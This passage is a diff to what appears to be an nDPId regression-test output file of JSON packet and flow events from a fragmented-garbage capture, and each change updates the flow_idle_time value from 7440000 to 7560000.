00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4384,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiomXiUkI0AjJCVeJiooKiY="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4385,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028953} @@ -9390,8 +9390,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4694,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiNyc2RsdWhna2Zkc2JrbnY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4695,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028956} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4695,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmMvLnRnZnRn"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244029256,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9HUj9HUj9zUj83NDgzOTbYPAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244029256,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9HUj9HUj9zUj83NDgzOTbYPAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4697,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029256} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4697,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAikoKiZeJSQjQCFAIyQlXiY="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4698,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029256} @@ -10016,8 +10016,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5007,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAigqJl4lJCNAIyQlXiYqKCo="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5008,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029259} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5008,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiZeJSQjJioo"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244029559,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAktJSkhHRkQyKiZERkdISkvKWwAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244029559,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAktJSkhHRkQyKiZERkdISkvKWwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5010,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029559} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5010,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiZeJSQjI0VUUiVZXlUmSSo="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5011,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029559} @@ -10642,8 +10642,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5320,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiI6aGRmbGtkYT5MPE1OQkg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5321,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029564} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5321,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdGREVXI0Ak"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244029864,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiVeSEJHVgo0MjE0NjMxOThZagAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244029864,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiVeSEJHVgo0MjE0NjMxOThZagAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5323,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029864} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5323,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjIwNTEpKComXiUkI0AjJCU="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5324,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029864} @@ -11268,8 +11268,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5633,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAigqJl4lJCNyc2RsdWhna2Y="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5634,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029868} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5634,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmRzYmtudmMv"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244030168,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj92mAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244030168,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj92mAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5636,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030168} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5636,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjc0ODM5NikoKiZeJSQjQCE="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5637,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030168} @@ -11894,8 +11894,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5946,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiVeJiooKSgqJl4lJCNAIyQ="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5947,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030173} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5947,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiVeJiooKiZe"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244030473,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiYtwwAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244030473,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiYtwwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5949,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030473} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5949,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkRGR0hKSyZeJSQjI0VUUiU="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5950,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030473} @@ -12520,8 +12520,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6259,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAgAAAAAAAAAAAAAAAAAAAAA="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6260,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030476} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6260,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAgAAAAAAAAAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244030777,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjQyMTQ2MzE5ODIwNTEpKCpc2AAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244030777,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjQyMTQ2MzE5ODIwNTEpKCpc2AAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6262,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030777} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6262,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiZeJSQjQCMkJV4mKigqJl4="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6263,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030777} @@ -13146,8 +13146,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6572,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAnJzZGx1aGdrZmRzYmtudmM="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6573,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030779} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":6573,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAi8udGdmdGc\/"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031080,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 